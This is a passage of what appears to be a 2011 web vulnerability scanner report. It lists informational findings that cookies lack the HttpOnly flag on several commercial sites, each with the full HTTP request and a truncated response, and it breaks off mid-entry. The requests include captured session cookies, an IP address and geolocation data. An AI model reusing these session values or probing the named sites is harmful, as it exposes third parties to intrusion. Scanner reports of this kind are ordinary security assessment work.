The following cookie was issued by the application and does not have the HttpOnly flag set:visitor_action=referrer%3Dwww.oracle.com%2Fopenworld%2Ftools%2Fmobile%2Findex.html%26content_id%3D29513%26internal_search%3Dxss%26traffic_source%3Ddirect%2Cdirect%2Cdirect%2Cdirect%2Cdirect%2Cdirect%2Creferral%26zone_id%3D509%26content_type_id%3D13%26visits%3D1; path=/; expires=Thu, 06-Oct-2011 16:09:26 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cybersecurity/contact_us HTTP/1.1 Host: www.csc.com Proxy-Connection: keep-alive Referer: http://www.csc.com/contact_us User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: BIGipServerwww.CSC.Com_HTTP-9000_Pool=1150396288.10275.0000; s_vi=[CS]v1|2733217B8516386C-600001A40000394C[CE]; visitor_info=country%3DUS%26region%3DTX%26city%3DDallas%26latitude%3D32.7825012207031%26longitude%3D-96.8207015991211%26domain%3Dsoftlayer.com%26organization%3DSoftLayer%2BTechnologies%26ip%3D50.23.123.106%26language%3Den-US%26http_user_agent%3DMozilla%252F5.0%2B%2528Windows%2BNT%2B6.1%253B%2BWOW64%2529%2BAppleWebKit%252F535.1%2B%2528KHTML%252C%2Blike%2BGecko%2529%2BChrome%252F13.0.782.220%2BSafari%252F535.1; subexpandable=-1c; __utma=253059739.694282920.1315342663.1315342663.1315342663.1; __utmb=253059739.6.10.1315342663; __utmc=253059739; __utmz=253059739.1315342663.1.1.utmcsr=oracle.com|utmccn=(referral)|utmcmd=referral|utmcct=/openworld/tools/mobile/index.html; IPE_S_26841=26841; _session=BAh7BjoPc2Vzc2lvbl9pZCIlZDQ3ZTkwZTY4MTZhNjllNmJiMTU4ZWFkOTk1N2NlYjU%3D--7d3a5af62ef35b69f0a33d9e8e51b9af33cdc6a0; visitor_action=referrer%3Dwww.oracle.com%2Fopenworld%2Ftools%2Fmobile%2Findex.html%26content_id%3D29513%26internal_search%3Dxss%26traffic_source%3Ddirect%2Cdirect%2Cdirect%2Cdirect%2Creferral%26zone_id%3D509%26content_type_id%3D13%26visits%3D1; s_sess=%20ev4%3Dxss%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:09:26 GMT Status: 200 ETag: "4c56494684a77f8dc752e50b92174ca2" X-Cache: MISS X-Runtime: 47 Content-Type: text/html; charset=utf-8 Cache-Control: private, max-age=0, must-revalidate, max-age=86400Set-Cookie: visitor_action=referrer%3Dwww.oracle.com%2Fopenworld%2Ftools%2Fmobile%2Findex.html%26content_id%3D29513%26internal_search%3Dxss%26traffic_source%3Ddirect%2Cdirect%2Cdirect%2Cdirect%2Cdirect%2Cdirect%2Creferral%26zone_id%3D509%26content_type_id%3D13%26visits%3D1; path=/; expires=Thu, 06-Oct-2011 16:09:26 GMT Expires: Wed, 07 Sep 2011 16:09:26 GMT Vary: Accept-Encoding Content-Length: 8060 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>...[SNIP]...
13.206. http://www.csc.com/search
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.csc.com
Path:
/search
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:visitor_action=referrer%3Dwww.oracle.com%2Fopenworld%2Ftools%2Fmobile%2Findex.html%26content_id%3D29513%26internal_search%3Dxss%26zone_id%3D509%26traffic_source%3Ddirect%2Creferral%26content_type_id%3D13%26visits%3D1; path=/; expires=Thu, 06-Oct-2011 16:08:57 GMT visitor_action=referrer%3Dwww.oracle.com%2Fopenworld%2Ftools%2Fmobile%2Findex.html%26internal_search%3Dxss%26content_id%3D29513%26traffic_source%3Ddirect%2Creferral%26zone_id%3D509%26content_type_id%3D13%26visits%3D1; path=/; expires=Thu, 06-Oct-2011 16:08:57 GMT The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /search?q=xss HTTP/1.1 Host: www.csc.com Proxy-Connection: keep-alive Referer: http://www.csc.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: BIGipServerwww.CSC.Com_HTTP-9000_Pool=1150396288.10275.0000; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=253059739.694282920.1315342663.1315342663.1315342663.1; __utmb=253059739.1.10.1315342663; __utmc=253059739; __utmz=253059739.1315342663.1.1.utmcsr=oracle.com|utmccn=(referral)|utmcmd=referral|utmcct=/openworld/tools/mobile/index.html; visitor_action=content_id%3D29513%26zone_id%3D509%26content_type_id%3D13%26visits%3D1%26traffic_source%3Dreferral%26referrer%3Dwww.oracle.com/openworld/tools/mobile/index.html; s_vi=[CS]v1|2733217B8516386C-600001A40000394C[CE]; visitor_info=country%3DUS%26region%3DTX%26city%3DDallas%26latitude%3D32.7825012207031%26longitude%3D-96.8207015991211%26domain%3Dsoftlayer.com%26organization%3DSoftLayer%2BTechnologies%26ip%3D50.23.123.106%26language%3Den-US%26http_user_agent%3DMozilla%252F5.0%2B%2528Windows%2BNT%2B6.1%253B%2BWOW64%2529%2BAppleWebKit%252F535.1%2B%2528KHTML%252C%2Blike%2BGecko%2529%2BChrome%252F13.0.782.220%2BSafari%252F535.1; _session=BAh7BjoPc2Vzc2lvbl9pZCIlZDQ3ZTkwZTY4MTZhNjllNmJiMTU4ZWFkOTk1N2NlYjU%3D--7d3a5af62ef35b69f0a33d9e8e51b9af33cdc6a0
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:08:57 GMT Status: 200 ETag: "1673c8635aa207a1de3af02d09940037" X-Runtime: 14 Content-Type: text/html; charset=utf-8 Cache-Control: private, max-age=0, must-revalidate, max-age=86400Set-Cookie: visitor_action=referrer%3Dwww.oracle.com%2Fopenworld%2Ftools%2Fmobile%2Findex.html%26content_id%3D29513%26internal_search%3Dxss%26zone_id%3D509%26traffic_source%3Ddirect%2Creferral%26content_type_id%3D13%26visits%3D1; path=/; expires=Thu, 06-Oct-2011 16:08:57 GMT Set-Cookie: visitor_action=referrer%3Dwww.oracle.com%2Fopenworld%2Ftools%2Fmobile%2Findex.html%26internal_search%3Dxss%26content_id%3D29513%26traffic_source%3Ddirect%2Creferral%26zone_id%3D509%26content_type_id%3D13%26visits%3D1; path=/; expires=Thu, 06-Oct-2011 16:08:57 GMT Set-Cookie: _session=BAh7BjoPc2Vzc2lvbl9pZCIlZDQ3ZTkwZTY4MTZhNjllNmJiMTU4ZWFkOTk1N2NlYjU%3D--7d3a5af62ef35b69f0a33d9e8e51b9af33cdc6a0; path=/; HttpOnly Expires: Wed, 07 Sep 2011 16:08:57 GMT Vary: Accept-Encoding Content-Length: 9018 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>...[SNIP]...
13.207. http://www.csc.com/services
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.csc.com
Path:
/services
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:visitor_action=referrer%3Dwww.oracle.com%2Fopenworld%2Ftools%2Fmobile%2Findex.html%26internal_search%3Dxss%26content_id%3D29513%26zone_id%3D509%26traffic_source%3Ddirect%2Cdirect%2Cdirect%2Creferral%26content_type_id%3D13%26visits%3D1; path=/; expires=Thu, 06-Oct-2011 16:09:05 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /services HTTP/1.1 Host: www.csc.com Proxy-Connection: keep-alive Referer: http://www.csc.com/search?q=xss User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: BIGipServerwww.CSC.Com_HTTP-9000_Pool=1150396288.10275.0000; s_vi=[CS]v1|2733217B8516386C-600001A40000394C[CE]; visitor_info=country%3DUS%26region%3DTX%26city%3DDallas%26latitude%3D32.7825012207031%26longitude%3D-96.8207015991211%26domain%3Dsoftlayer.com%26organization%3DSoftLayer%2BTechnologies%26ip%3D50.23.123.106%26language%3Den-US%26http_user_agent%3DMozilla%252F5.0%2B%2528Windows%2BNT%2B6.1%253B%2BWOW64%2529%2BAppleWebKit%252F535.1%2B%2528KHTML%252C%2Blike%2BGecko%2529%2BChrome%252F13.0.782.220%2BSafari%252F535.1; visitor_action=referrer%3Dwww.oracle.com%2Fopenworld%2Ftools%2Fmobile%2Findex.html%26internal_search%3Dxss%26content_id%3D29513%26zone_id%3D509%26traffic_source%3Ddirect%2Creferral%26content_type_id%3D13%26visits%3D1; subexpandable=-1c; __utma=253059739.694282920.1315342663.1315342663.1315342663.1; __utmb=253059739.2.10.1315342663; __utmc=253059739; __utmz=253059739.1315342663.1.1.utmcsr=oracle.com|utmccn=(referral)|utmcmd=referral|utmcct=/openworld/tools/mobile/index.html; IPE_S_26841=26841; _session=BAh7BjoPc2Vzc2lvbl9pZCIlZDQ3ZTkwZTY4MTZhNjllNmJiMTU4ZWFkOTk1N2NlYjU%3D--7d3a5af62ef35b69f0a33d9e8e51b9af33cdc6a0; s_sess=%20s_cc%3Dtrue%3B%20ev4%3Dxss%3B%20s_sq%3Dcsccom%253D%252526pid%25253DSearch%2525253AHome%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.csc.com/services%252526ot%25253DA%3B
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:09:05 GMT Status: 200 ETag: "fb1aa7a72cdf1607fbfd2a5107efce65" X-Cache: MISS X-Runtime: 33 Content-Type: text/html; charset=utf-8 Cache-Control: private, max-age=0, must-revalidate, max-age=86400Set-Cookie: visitor_action=referrer%3Dwww.oracle.com%2Fopenworld%2Ftools%2Fmobile%2Findex.html%26internal_search%3Dxss%26content_id%3D29513%26zone_id%3D509%26traffic_source%3Ddirect%2Cdirect%2Cdirect%2Creferral%26content_type_id%3D13%26visits%3D1; path=/; expires=Thu, 06-Oct-2011 16:09:05 GMT Expires: Wed, 07 Sep 2011 16:09:05 GMT Vary: Accept-Encoding Content-Length: 9996 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>...[SNIP]...
13.208. http://www.csc.com/utils/live_search
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.csc.com
Path:
/utils/live_search
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:visitor_action=referrer%3Dwww.oracle.com%2Fopenworld%2Ftools%2Fmobile%2Findex.html%26content_id%3D29513%26internal_search%3Dxss%26zone_id%3D509%26traffic_source%3Dreferral%26content_type_id%3D13%26visits%3D1; path=/; expires=Thu, 06-Oct-2011 16:08:57 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /utils/live_search?q=xss HTTP/1.1 Host: www.csc.com Proxy-Connection: keep-alive Referer: http://www.csc.com/ X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: BIGipServerwww.CSC.Com_HTTP-9000_Pool=1150396288.10275.0000; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=253059739.694282920.1315342663.1315342663.1315342663.1; __utmb=253059739.1.10.1315342663; __utmc=253059739; __utmz=253059739.1315342663.1.1.utmcsr=oracle.com|utmccn=(referral)|utmcmd=referral|utmcct=/openworld/tools/mobile/index.html; visitor_action=content_id%3D29513%26zone_id%3D509%26content_type_id%3D13%26visits%3D1%26traffic_source%3Dreferral%26referrer%3Dwww.oracle.com/openworld/tools/mobile/index.html; s_vi=[CS]v1|2733217B8516386C-600001A40000394C[CE]; visitor_info=country%3DUS%26region%3DTX%26city%3DDallas%26latitude%3D32.7825012207031%26longitude%3D-96.8207015991211%26domain%3Dsoftlayer.com%26organization%3DSoftLayer%2BTechnologies%26ip%3D50.23.123.106%26language%3Den-US%26http_user_agent%3DMozilla%252F5.0%2B%2528Windows%2BNT%2B6.1%253B%2BWOW64%2529%2BAppleWebKit%252F535.1%2B%2528KHTML%252C%2Blike%2BGecko%2529%2BChrome%252F13.0.782.220%2BSafari%252F535.1; _session=BAh7BjoPc2Vzc2lvbl9pZCIlZDQ3ZTkwZTY4MTZhNjllNmJiMTU4ZWFkOTk1N2NlYjU%3D--7d3a5af62ef35b69f0a33d9e8e51b9af33cdc6a0
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:08:57 GMT Status: 200 ETag: "6855c96cfed8218fbfb755df41adf389" X-Runtime: 3 Content-Type: text/html; charset=utf-8 Cache-Control: private, max-age=0, must-revalidate, max-age=86400Set-Cookie: visitor_action=referrer%3Dwww.oracle.com%2Fopenworld%2Ftools%2Fmobile%2Findex.html%26content_id%3D29513%26internal_search%3Dxss%26zone_id%3D509%26traffic_source%3Dreferral%26content_type_id%3D13%26visits%3D1; path=/; expires=Thu, 06-Oct-2011 16:08:57 GMT Set-Cookie: _session=BAh7BjoPc2Vzc2lvbl9pZCIlZDQ3ZTkwZTY4MTZhNjllNmJiMTU4ZWFkOTk1N2NlYjU%3D--7d3a5af62ef35b69f0a33d9e8e51b9af33cdc6a0; path=/; HttpOnly Expires: Wed, 07 Sep 2011 16:08:57 GMT Vary: Accept-Encoding Content-Length: 2083 <a href="http://assets1.csc.com/es/downloads/7380_2.pdf?ref=ls">7380_2.pdf</a> <br /> <b>...</b> technologies. And the eThreat ...winners... are: ... Web application exploits,<br> partic...[SNIP]...
13.209. http://www.gillettevenus.com/en_US/buy_it_now/product_links.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.gillettevenus.com
Path:
/en_US/buy_it_now/product_links.jsp
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:preferredLocale=en_US; Expires=Sun, 04-Sep-2016 16:45:34 GMT; Path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en_US/buy_it_now/product_links.jsp?upc=047400098978 HTTP/1.1 Host: www.gillettevenus.com Proxy-Connection: keep-alive Referer: http://www.gillettevenus.com/en_US/products/refillables/embrace_purple/index.jsp?utm_source=google&utm_medium=cpc&utm_term=beauty%20product&utm_campaign=Gillette.Venus_Search_Category+Interest_03.2010|Bath+%26+Beauty&utm_content=sgaAjGa2X|pcrid|6694000949 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: preferredLocale=en_US; JSESSIONID=82AE08060FF783B0B7073A67819E2C23.el61; __utmx=193945275.; __utmxx=193945275.; __utma=193945275.1261590129.1315345534.1315345534.1315345534.1; __utmb=193945275.2.10.1315345534; __utmc=193945275; __utmz=193945275.1315345534.1.1.utmcsr=google|utmccn=Gillette.Venus_Search_Category%20Interest_03.2010|Bath%20&%20Beauty|utmcmd=cpc|utmctr=beauty%20product|utmcct=sgaAjGa2X|pcrid|6694000949; IPE_S_7929=7929
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:45:34 GMTSet-Cookie: preferredLocale=en_US; Expires=Sun, 04-Sep-2016 16:45:34 GMT; Path=/ Content-Type: text/html;charset=ISO-8859-1 Connection: close Content-Length: 1552 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <h...[SNIP]...
13.210. http://www.gillettevenus.com/en_US/products/refillables/embrace/index.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.gillettevenus.com
Path:
/en_US/products/refillables/embrace/index.jsp
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:preferredLocale=en_US; Expires=Sun, 04-Sep-2016 16:46:37 GMT; Path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en_US/products/refillables/embrace/index.jsp HTTP/1.1 Host: www.gillettevenus.com Proxy-Connection: keep-alive Referer: http://www.gillettevenus.com/en_US/search/index.jsp?q=razorphonehelpfaq User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=82AE08060FF783B0B7073A67819E2C23.el61; IPE_S_7929=7929; bvgacefRatingsAndReviews=true; preferredLocale=en_US; __utmx=193945275.; __utmxx=193945275.; __utma=193945275.1261590129.1315345534.1315345534.1315345534.1; __utmb=193945275.7.9.1315345534; __utmc=193945275; __utmz=193945275.1315345534.1.1.utmcsr=google|utmccn=Gillette.Venus_Search_Category%20Interest_03.2010|Bath%20&%20Beauty|utmcmd=cpc|utmctr=beauty%20product|utmcct=sgaAjGa2X|pcrid|6694000949; IPE_S_7929=7929
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:46:37 GMTSet-Cookie: preferredLocale=en_US; Expires=Sun, 04-Sep-2016 16:46:37 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Connection: close Content-Length: 89549 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xm...[SNIP]...
13.211. http://www.gillettevenus.com/en_US/products/refillables/embrace_purple/index.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.gillettevenus.com
Path:
/en_US/products/refillables/embrace_purple/index.jsp
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:preferredLocale=en_US; Expires=Sun, 04-Sep-2016 16:45:32 GMT; Path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en_US/products/refillables/embrace_purple/index.jsp?utm_source=google&utm_medium=cpc&utm_term=beauty%20product&utm_campaign=Gillette.Venus_Search_Category+Interest_03.2010|Bath+%26+Beauty&utm_content=sgaAjGa2X|pcrid|6694000949 HTTP/1.1 Host: www.gillettevenus.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Direct+Beauty+Product User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:45:32 GMTSet-Cookie: preferredLocale=en_US; Expires=Sun, 04-Sep-2016 16:45:32 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Connection: close Content-Length: 81708 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xm...[SNIP]...
13.212. http://www.gillettevenus.com/en_US/razor_finder/index.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.gillettevenus.com
Path:
/en_US/razor_finder/index.jsp
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:preferredLocale=en_US; Expires=Sun, 04-Sep-2016 16:46:24 GMT; Path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en_US/razor_finder/index.jsp HTTP/1.1 Host: www.gillettevenus.com Proxy-Connection: keep-alive Referer: http://www.gillettevenus.com/en_US/products/refillables/embrace_purple/index.jsp?utm_source=google&utm_medium=cpc&utm_term=beauty%20product&utm_campaign=Gillette.Venus_Search_Category+Interest_03.2010|Bath+%26+Beauty&utm_content=sgaAjGa2X|pcrid|6694000949 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=82AE08060FF783B0B7073A67819E2C23.el61; __utmx=193945275.; __utmxx=193945275.; IPE_S_7929=7929; preferredLocale=en_US; __utma=193945275.1261590129.1315345534.1315345534.1315345534.1; __utmb=193945275.3.9.1315345534; __utmc=193945275; __utmz=193945275.1315345534.1.1.utmcsr=google|utmccn=Gillette.Venus_Search_Category%20Interest_03.2010|Bath%20&%20Beauty|utmcmd=cpc|utmctr=beauty%20product|utmcct=sgaAjGa2X|pcrid|6694000949; bvgacefRatingsAndReviews=true
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:46:24 GMTSet-Cookie: preferredLocale=en_US; Expires=Sun, 04-Sep-2016 16:46:24 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Connection: close Content-Length: 12747 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>...[SNIP]...
13.213. http://www.gillettevenus.com/en_US/search/index.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.gillettevenus.com
Path:
/en_US/search/index.jsp
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:preferredLocale=en_US; Expires=Sun, 04-Sep-2016 16:46:33 GMT; Path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en_US/search/index.jsp?q=razor+phone+help+faq HTTP/1.1 Host: www.gillettevenus.com Proxy-Connection: keep-alive Referer: http://www.gillettevenus.com/en_US/razor_finder/index.jsp User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=82AE08060FF783B0B7073A67819E2C23.el61; IPE_S_7929=7929; bvgacefRatingsAndReviews=true; preferredLocale=en_US; __utmx=193945275.; __utmxx=193945275.; IPE_S_7929=7929; __utma=193945275.1261590129.1315345534.1315345534.1315345534.1; __utmb=193945275.5.9.1315345534; __utmc=193945275; __utmz=193945275.1315345534.1.1.utmcsr=google|utmccn=Gillette.Venus_Search_Category%20Interest_03.2010|Bath%20&%20Beauty|utmcmd=cpc|utmctr=beauty%20product|utmcct=sgaAjGa2X|pcrid|6694000949
Response
HTTP/1.1 302 Moved Temporarily Date: Tue, 06 Sep 2011 16:46:33 GMTSet-Cookie: preferredLocale=en_US; Expires=Sun, 04-Sep-2016 16:46:33 GMT; Path=/ Location: http://www.gillettevenus.com/en_US/search/index.jsp?q=razorphonehelpfaq Content-Type: text/html;charset=UTF-8 Content-Length: 0 Connection: close
13.214. http://www.googleadservices.com/pagead/aclk
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.googleadservices.com
Path:
/pagead/aclk
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:Conversion=CocBQ3RFWDg1VHhtVHNOeHBiT0lBcVcyMklrUHR0RGE5UUdlXzlXNUhaZVp3TGxFQ0FBUUFTZ0RVSTdPaDdIX19fX19fd0ZneVo3LWhzaWpfQnFnQWU3SnJ2OER5QUVCcWdRY1Q5QTkwci15OUdUdW84QUlPTnNnQVIwV1RVVGxIUUJ3c3d4ZzFnEhMIp7veufiIqwIVET2DCh1iBQjVGAEg5qTVlr6Y98iGAUgB; expires=Thu, 06-Oct-2011 15:31:58 GMT; path=/pagead/conversion/1072407790/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pagead/aclk?sa=L&ai=CtEX85TxmTsNxpbOIAqW22IkPttDa9QGe_9W5HZeZwLlECAAQASgDUI7Oh7H______wFgyZ7-hsij_BqgAe7Jrv8DyAEBqgQcT9A90r-y9GTuo8AIONsgAR0WTUTlHQBwswxg1g&ved=0CAgQ0Qw&val=ChAyNmVhN2ZlZjBhNmNmNDNiELDC9fIEGgiq4KTBfyLUpSABKAAw88uL57LFh-j1ATjy4fjyBED7x5jzBA&sig=AOD64_2gBFwMK1AEYNxHS3sGMa4DnXPf0Q&adurl=http://www.volusion.com/%3F_kk%3D%252Becommerce%2520%252Bsolution%26_kt%3D3fda914a-c56d-407d-b8c6-0b1636cef4d3 HTTP/1.1 Host: www.googleadservices.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ATG+e-commerce+solutio User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Found P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"Set-Cookie: Conversion=CocBQ3RFWDg1VHhtVHNOeHBiT0lBcVcyMklrUHR0RGE5UUdlXzlXNUhaZVp3TGxFQ0FBUUFTZ0RVSTdPaDdIX19fX19fd0ZneVo3LWhzaWpfQnFnQWU3SnJ2OER5QUVCcWdRY1Q5QTkwci15OUdUdW84QUlPTnNnQVIwV1RVVGxIUUJ3c3d4ZzFnEhMIp7veufiIqwIVET2DCh1iBQjVGAEg5qTVlr6Y98iGAUgB; expires=Thu, 06-Oct-2011 15:31:58 GMT; path=/pagead/conversion/1072407790/ Cache-Control: private Location: http://www.volusion.com/?_kk=%2Becommerce%20%2Bsolution&_kt=3fda914a-c56d-407d-b8c6-0b1636cef4d3&gclid=CKe73rn4iKsCFRE9gwodYgUI1Q Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Tue, 06 Sep 2011 15:31:58 GMT Server: AdClickServer Content-Length: 0 X-XSS-Protection: 1; mode=block
13.215. http://www.marykay.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:TLTHID=9C5046FD4D123B0E95A0D3931B51113E; Path=/; Domain=.marykay.com www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:45 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /?pid=mk HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Direct+Beauty+Product User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
